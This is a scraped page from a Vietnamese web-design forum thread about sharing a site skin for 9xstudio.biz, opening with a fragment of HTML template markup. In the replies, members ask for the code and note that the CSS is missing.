                  <table cellpadding="0" cellspacing="0" width="100%" class="three-col">
                    <tbody>
                        <tr>
                          <td valign="top" width="{C1SIZE}">
                             
                          </td>
                          <td valign="top" width="100%">
<!-- BEGIN html_validation -->
                          </td>
                        </tr>
                    </tbody>
                  </table>
              </div>
            </div>
        </td>
      </tr>
  </table>
</body>
</html>
<!-- END html_validation -->

5Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Fri Sep 16, 2011 3:21 pm

™ßắçKµÑ™

™ßắçKµÑ™
Thành Viên
Thành Viên

anh Hùng Share luôn code web mình nhé! sá

6Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Fri Sep 16, 2011 6:58 pm

An Hùng BMT

An Hùng BMT
Admin
Admin

đã share trong Chia sẽ tài nguyên.

7Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Fri Sep 16, 2011 7:25 pm

anhday98

anhday98
Smod
Smod

? ko hỉu

8Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Sun Mar 04, 2012 11:14 am

haiboiroi

haiboiroi
Thành Viên
Thành Viên

Share Skin 9xstudio.biz 1546370010

9Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Tue Jul 10, 2012 8:34 pm

ruby-coding

ruby-coding
Thành Viên
Thành Viên

Sao ko thấy Css vậy

10Share Skin 9xstudio.biz Empty Re: Share Skin 9xstudio.biz Thu Jul 12, 2012 5:45 am

JoOnG

JoOnG
Smod
Smod

thiếu css rồi đại ca ơi

Sponsored content



Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum